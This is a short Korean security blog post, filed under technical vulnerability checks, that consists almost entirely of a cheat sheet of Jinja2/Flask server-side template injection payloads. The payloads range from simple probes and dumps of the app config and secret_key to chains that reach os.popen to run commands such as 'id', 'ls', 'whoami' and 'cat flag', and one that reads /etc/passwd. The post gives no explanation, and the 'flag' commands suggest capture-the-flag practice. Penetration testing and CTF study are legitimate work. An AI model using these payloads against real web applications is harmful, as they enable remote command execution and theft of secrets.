2025. 6. 6. 21:18ㆍ보안 컨설팅/기술적 취약점 점검
{{ 7+7 }}
{{ config }}
{{ config.items() }}
{{ config['secret_key'] }}
{{"".__class__.__mro__[1].__subclasses__()[index]('cat flag', shell=True, stdout=-1).communicate()}}
{{"".__class__.__mro__[1].__subclasses__()[index]('cat flag', shell=True, stdout=-1).communicate()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{ (config|attr('__class__')).__init__.__globals__['os'].popen('cat flag').read() }}
{{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('id')|attr('read')()}}
{{ self._TemplateReference__context.cyder.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
{{ get_flashed_messages.__globals__['__builtins__'].__open('/etc/passwd').read() }}
{{get_flashed_messages.__globals__['__builtins__'].__eval__('__import__("os").popen("whoami").read()')}}
{{ url_for.__globals__.__builtins__.__eval__('__import__("os").popen("ls").read()') }}
'보안 컨설팅 > 기술적 취약점 점검' 카테고리의 다른 글
| [U-08] /etc/shadow 파일 소유자 및 권한 설정 관련 논의 (1) | 2025.07.09 |
|---|---|
| [U-46] 패스워드 최소 길이 설정 (0) | 2025.07.02 |
| NET-011 안전한 암호화 알고리즘 설정 여부 (0) | 2025.05.26 |
| [SRV-001] 안전한 네트워크 모니터링 서비스 사용 (0) | 2025.02.21 |
| [U-37] 웹서비스 상위 디렉터리 접근 금지(allowoverride) (4) | 2024.12.27 |